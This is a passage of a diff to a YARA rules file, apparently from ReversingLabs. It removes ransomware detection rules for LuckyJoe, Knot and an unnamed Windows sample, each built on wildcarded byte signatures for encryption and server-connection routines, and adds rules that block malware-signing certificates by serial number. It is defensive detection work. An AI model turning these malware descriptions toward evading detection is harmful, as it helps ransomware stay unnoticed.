-            ?? ?? ?? 8B 53 ?? 8D 4B ?? 83 FA ?? 0F 43 4B ?? 8D 41 ?? 89 85 ?? ?? ?? ?? 90 8A 01
-            41 84 C0 75 ?? 2B 8D ?? ?? ?? ?? 8D 43 ?? 6A ?? 83 FA ?? 51 0F 43 43 ?? 50 56 FF 15
-            ?? ?? ?? ?? 85 C0 79 ?? FF D7 50 51 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
-            C4 ?? 8B C8 E8 ?? ?? ?? ?? EB ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8
-            ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ??
-            83 F8 ?? 0F 85 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? BE ?? ?? ?? ?? 8B 43 ?? 83 F8 ?? 72 ?? 8B 4B ?? 40 3D ?? ?? ?? ?? 72
-            ?? F6 C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82
-            ?? ?? ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B C6 8B 4D
-            ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D 8B E3 5B C3
-        }
-		$encryption_loop_1_0 = {
-            66 8B 01 66 3B 02 75 ?? 83 C1 ?? 83 C2 ?? 83 EE ?? 75 ?? C6 85 ?? ?? ?? ?? ?? E9 ??
-            ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 8B 40 ?? 03 C8 8B 51 ?? 83 CA ??
-            8B C2 83 C8 ?? 83 79 ?? ?? 0F 45 C2 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 32 C0 0F 85 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 C7 45 ?? ?? ??
-            ?? ?? 8D 8D ?? ?? ?? ?? 83 CB ?? 68 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? 8B D7 8B 9D ?? ?? ?? ?? 83 CB ?? 83 7F ?? ?? 89 9D ?? ?? ?? ?? 89
-            9D ?? ?? ?? ?? 72 ?? 8B 17 83 78 ?? ?? 8B C8 72 ?? 8B 08 8B 70 ?? 3B 77 ?? 75 ?? 85
-            F6 0F 84
-        }
-		$encryption_loop_1_1 = {
-            66 8B 01 66 3B 02 75 ?? 83 C1 ?? 83 C2 ?? 83 EE ?? 75 ?? C6 85 ?? ?? ?? ?? ?? EB ??
-            32 C0 74 ?? C6 85 ?? ?? ?? ?? ?? EB ?? C6 85 ?? ?? ?? ?? ?? F6 C3 ?? 74 ?? 83 E3 ??
-            8D 8D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? F6 C3 ?? 74 ?? 83 E3 ?? 8D 8D ??
-            ?? ?? ?? 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? F6 C3 ?? 74 ?? 83 E3 ?? 8D 8D ?? ?? ?? ??
-            89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? F6 C3 ?? 74 ?? 83 E3 ?? 8D 8D ?? ?? ?? ?? 89 9D ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 32 C0 75 ?? 83 E3 ?? 8D 8D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 32 C0 C7 45 ?? ?? ?? ?? ?? 75 ?? 83 E3 ?? 8D 8D ?? ?? ?? ?? 89 9D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 51 FF B5 ?? ?? ?? ?? BA
-            ?? ?? ?? ?? C6 45 ?? ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15
-            ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 95
-        }
-		$encryption_loop_1_2 = {
-            57 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ??
-            ?? ?? ?? C3 8B 85 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            89 85 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 50 FF B5
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ??
-            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E
-            5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 51 FF B5 ?? ?? ?? ?? BA ?? ?? ?? ?? 51
-            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85
-            C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 69 0F ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ??
-            ?? ?? BA ?? ?? ?? ?? 03 48 ?? 8D 85 ?? ?? ?? ?? 50 51 E8 ?? ?? ?? ?? 85 C0 74 ?? BA
-            ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? E9
-        }
-		$encryption_loop_1_3 = {
-            69 37 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 03 70 ?? E8 ?? ?? ?? ?? 8B 95 ??
-            ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 81 CB ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 78 ?? 8D
-            4A ?? 89 08 8D 4A ?? 89 48 ?? 8D 4A ?? 89 48 ?? 8D 4A ?? 89 48 ?? 8D 4A ?? 89 48 ??
-            B9 ?? ?? ?? ?? F3 A5 66 A5 C7 80 ?? ?? ?? ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ??
-            ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ??
-            ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
-            C6 45 ?? ?? 8B B5 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 56 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 56 E8 ?? ?? ?? ?? 83 C4
-            ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B BD ??
-            ?? ?? ?? 8B 8D ?? ?? ?? ?? FF 07 8B 07 89 41 ?? 69 17 ?? ?? ?? ?? 8B 41 ?? 80 A4 02
-            ?? ?? ?? ?? ?? 8B 01 48 39 07 75 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50
-            E8 ?? ?? ?? ?? 83 C4 ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F
-            84 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8A 11 8B
-            C8 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $remote_server_connection_1_0 and $remote_server_connection_1_1 and ( all of ( $encryption_loop_1_* ) ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Vertical" and ( pe.signatures [ i ] . serial == "00:c2:fc:83:d4:58:e6:53:83:7f:cf:c1:32:c9:b0:30:62" or pe.signatures [ i ] . serial == "c2:fc:83:d4:58:e6:53:83:7f:cf:c1:32:c9:b0:30:62" ) and 1602201600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Linux_Ransomware_Luckyjoe : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_54C793D2224Bdd6Ca527Bb2B7B9Dfe9D : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects LuckyJoe ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8dc98d71-b79d-5b09-9383-11f2b57baeb5"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "80e92980-f4eb-5ac2-9f68-14c352758791"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Linux.Ransomware.LuckyJoe.yara#L1-L146"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "1e7df2c45bee072af233cf8f355a84ec931fe96afa3fbdcd225dded1b75ea961"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L11706-L11722"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "81c9c1d841d4aae3de229cc499ee84920d89928590a3eb157f7a7a7fbc46b4a8"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "LuckyJoe"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$main_call_p1 = {
-            55 48 89 E5 48 81 EC ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? 48
-            C7 45 ?? ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ??
-            48 89 45 ?? 48 8B 55 ?? 48 8B 45 ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 48 8D 75 ?? 48
-            8B 45 ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? BE ?? ??
-            ?? ?? BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 89 C7 E8
-            ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 48 89 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? E8 ?? ??
-            ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 35 ?? ?? ?? ?? 48 83 EC ?? 48 8B 45
-            ?? 6A ?? 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 C7
-            E8 ?? ?? ?? ?? 48 83 C4 ?? 48 8B 15 ?? ?? ?? ?? 48 8B 45 ?? 48 89 D6 48 89 C7 E8 ??
-            ?? ?? ?? 48 8B 45 ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ??
-            ?? ?? 48 98 48 89 45 ?? 48 8B 45 ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48
-        }
-		$main_call_p2 = {
-            89 C7 E8 ?? ?? ?? ?? 48 98 48 89 45 ?? 48 8B 45 ?? 48 83 C0 ?? 48 89 C7 E8 ?? ?? ??
-            ?? 48 89 45 ?? 48 8B 45 ?? 48 83 C0 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 45
-            ?? 89 C2 48 8B 4D ?? 48 8B 45 ?? 48 89 CE 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 89 C2
-            48 8B 4D ?? 48 8B 45 ?? 48 89 CE 48 89 C7 E8 ?? ?? ?? ?? 48 8B 55 ?? 48 8B 45 ?? 48
-            01 D0 C6 00 ?? 48 8B 55 ?? 48 8B 45 ?? 48 01 D0 C6 00 ?? 48 8B 45 ?? 48 8B 55 ?? 48
-            89 D6 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 83 7D ?? ?? 75 ?? BF ?? ?? ?? ?? E8 ??
-            ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C6 BF ?? ?? ?? ?? B8 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? B8
-            ?? ?? ?? ?? E9 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 45 ??
-            48 83 7D ?? ?? 74 ?? 48 8B 55 ?? 48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7 B8
-        }
-		$main_call_p3 = {
-            E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 79 ?? 48 8B 45 ?? 89 C7 E8 ?? ?? ?? ?? B8 ?? ??
-            ?? ?? E9 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 89 C7 E8 ?? ??
-            ?? ?? 48 C7 45 ?? ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 45
-            ?? 48 83 7D ?? ?? 74 ?? EB ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ??
-            ?? ?? 48 8B 55 ?? 48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7 B8 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            89 45 ?? 83 7D ?? ?? 79 ?? 48 8B 45 ?? 89 C7 E8 ?? ?? ?? ?? EB ?? 48 8B 45 ?? 48 89
-            C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 89 C7 E8 ?? ?? ?? ?? EB ?? BF ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ??
-            ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 48 98 48 8B 84
-            C5 ?? ?? ?? ?? 48 89 C6 BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 48 98
-            48 8B 84 C5 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 83 45 ?? ?? 83 7D ?? ?? 74 ?? BF ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8
-            ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? C9 C3
-        }
-		$encrypt_files_p1 = {
-            55 48 89 E5 53 48 81 EC ?? ?? ?? ?? 48 89 BD ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? BA ??
-            ?? ?? ?? B9 ?? ?? ?? ?? 48 89 C7 48 89 D6 F3 48 A5 48 89 F2 48 89 F8 0F B7 0A 66 89
-            08 48 8D 40 ?? 48 8D 52 ?? 48 C7 45 ?? ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            48 C7 45 ?? ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 89 D7
-            F3 48 AB 48 8B 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 83 7D ?? ?? 75
-            ?? 48 8B 85 ?? ?? ?? ?? 48 89 C6 BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ??
-            ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 D6 48 89 C7
-            E8 ?? ?? ?? ?? 48 8B 45 ?? 0F B6 40 ?? 3C ?? 0F 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ??
-            48 89 C7 E8 ?? ?? ?? ?? 48 89 C3 48 8B 45 ?? 48 83 C0 ?? 48 89 C7 E8 ?? ?? ?? ?? 48
-            01 D8 48 83 C0 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 85 ?? ?? ?? ?? BE ?? ??
-            ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 84 C0 74 ?? 48 8B 45 ?? 48 8D 48 ?? 48 8B 95 ?? ?? ??
-            ?? 48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 48 8B 45
-            ?? 48 8D 48 ?? 48 8B 95 ?? ?? ?? ?? 48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7 B8 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8B 4D ?? 48 8D 85 ?? ?? ?? ?? 48 89 CE 48
-            89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? EB ?? 48 8B 45 ?? 48 83 C0 ?? 48 89 C7 E8 ?? ?? ??
-            ?? 48 89 C2 48 8B 45 ?? 48 89 C6 48 89 D7 E8 ?? ?? ?? ?? 85 C0 75 ?? 48 8B 45 ?? 48
-        }
-		$encrypt_files_p2 = {
-            89 C6 BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ??
-            ?? EB ?? 48 8D 95 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C6 BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48
-            89 45 ?? 48 83 7D ?? ?? 75 ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48
-            8B 45 ?? 0F B6 40 ?? 3C ?? 0F 85 ?? ?? ?? ?? 48 8B 45 ?? 48 83 C0 ?? BE ?? ?? ?? ??
-            48 89 C7 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8B 45 ?? 48 83 C0 ?? BE ?? ?? ??
-            ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8B 45 ?? 48 83 C0 ?? 48 89 45
-            ?? 48 8B 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C3 48 8B 45 ?? 48 89 C7 E8 ??
-            ?? ?? ?? 48 01 D8 48 83 C0 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 85 ?? ?? ??
-            ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 84 C0 74 ?? 48 8B 45 ?? 48 8D 48 ?? 48 8B
-            95 ?? ?? ?? ?? 48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB
-            ?? 48 8B 45 ?? 48 8D 48 ?? 48 8B 95 ?? ?? ?? ?? 48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89
-            C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 83 7D ?? ?? 0F
-            85 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5D C3
-        }
-		$encrypt_internal_message_p1 = {
-            55 48 89 E5 53 48 83 EC ?? 48 89 7D ?? 48 89 75 ?? 48 C7 45 ?? ?? ?? ?? ?? BF ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 89 45 ?? 48 8B
-            45 ?? 48 89 C7 E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 83 C0 ?? 48 98 48 89 C7 E8 ?? ?? ??
-            ?? 48 89 45 ?? 8B 45 ?? 83 C0 ?? 48 63 D0 48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ??
-            ?? ?? ?? 8B 45 ?? 48 63 D0 48 8B 4D ?? 48 8B 45 ?? 48 89 CE 48 89 C7 E8 ?? ?? ?? ??
-            8B 45 ?? 48 98 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? 8B 45 ?? 83 E8 ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 66 0F EF C0 F2 0F 2A 45 ??
-            66 0F EF C9 F2 0F 2A 4D ?? F2 0F 5E C1 E8 ?? ?? ?? ?? F2 0F 2C C0 89 45 ?? 8B 45 ??
-            0F AF 45 ?? 48 98 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 8B 45 ?? 0F AF 45 ?? 48 63 D0
-            48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 8B 45 ?? 0F AF 45 ?? 89 C3 48 8B
-            45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C6 8B 45 ?? 89 C1 89 DA BF ?? ?? ?? ?? B8 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? E9 ?? ?? ?? ?? 8B 45 ?? 2B 45 ?? 3B 45 ?? 7D ?? 8B 45 ?? 2B 45 ?? 89 45 ?? 8B 45
-            ?? 48 63 D0 48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 8B 45 ?? 2B 45 ?? 89
-        }
-		$encrypt_internal_message_p2 = {
-            C6 BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 48 63 D0 48 8B 45 ?? 48 8D
-            34 02 48 8B 4D ?? 48 8B 55 ?? 8B 45 ?? 41 B8 ?? ?? ?? ?? 89 C7 E8 ?? ?? ?? ?? 89 45
-            ?? 8B 45 ?? 89 C6 BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 75 ?? E8
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C2 48 8B 45 ?? 48 89 C6 48 89 D7 E8 ?? ?? ?? ?? 48
-            8B 05 ?? ?? ?? ?? 48 8B 55 ?? BE ?? ?? ?? ?? 48 89 C7 B8 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ??
-            48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ??
-            ?? ?? 8B 45 ?? 48 63 D0 8B 45 ?? 48 63 C8 48 8B 45 ?? 48 01 C1 48 8B 45 ?? 48 89 C6
-            48 89 CF E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C6 BF ?? ?? ?? ??
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 01 45 ?? 8B 45 ?? 01 45 ?? 48 8B 45 ?? 48 89
-            C7 E8 ?? ?? ?? ?? 83 45 ?? ?? 8B 45 ?? 3B 45 ?? 0F 8E ?? ?? ?? ?? 48 8B 45 ?? 48 89
-            C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 8B 4D ?? 48 8B 45 ?? BA ?? ??
-            ?? ?? 89 CE 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ??
-            48 89 C6 BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 45 ?? 48 83 C4 ?? 5B 5D
-            C3
-        }
-
 	condition:
-		uint32( 0 ) == 0x464C457F and ( all of ( $main_call_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $encrypt_internal_message_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CODE - HANDLE, s. r. o." and pe.signatures [ i ] . serial == "54:c7:93:d2:22:4b:dd:6c:a5:27:bb:2b:7b:9d:fe:9d" and 1629676800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Knot : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_8Cece6Df54Cf6Ad63596546D77Ba3581 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Knot ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4dfe9da5-7ab1-57dc-95fc-b05777f235b8"
-		date = "2021-03-19"
-		modified = "2021-03-19"
+		id = "bde12eeb-c4f8-5da3-8493-0f94cb1bf1f7"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Knot.yara#L1-L118"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "a7a3e13139d68314e583ec225a5d56373a551e67d46984dcf9a228a1f7275f14"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L11724-L11742"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "d6b5bca36ef492ce9b79be905c86c66d43ef38701dafeed977229034119bd00d"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Knot"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? 50
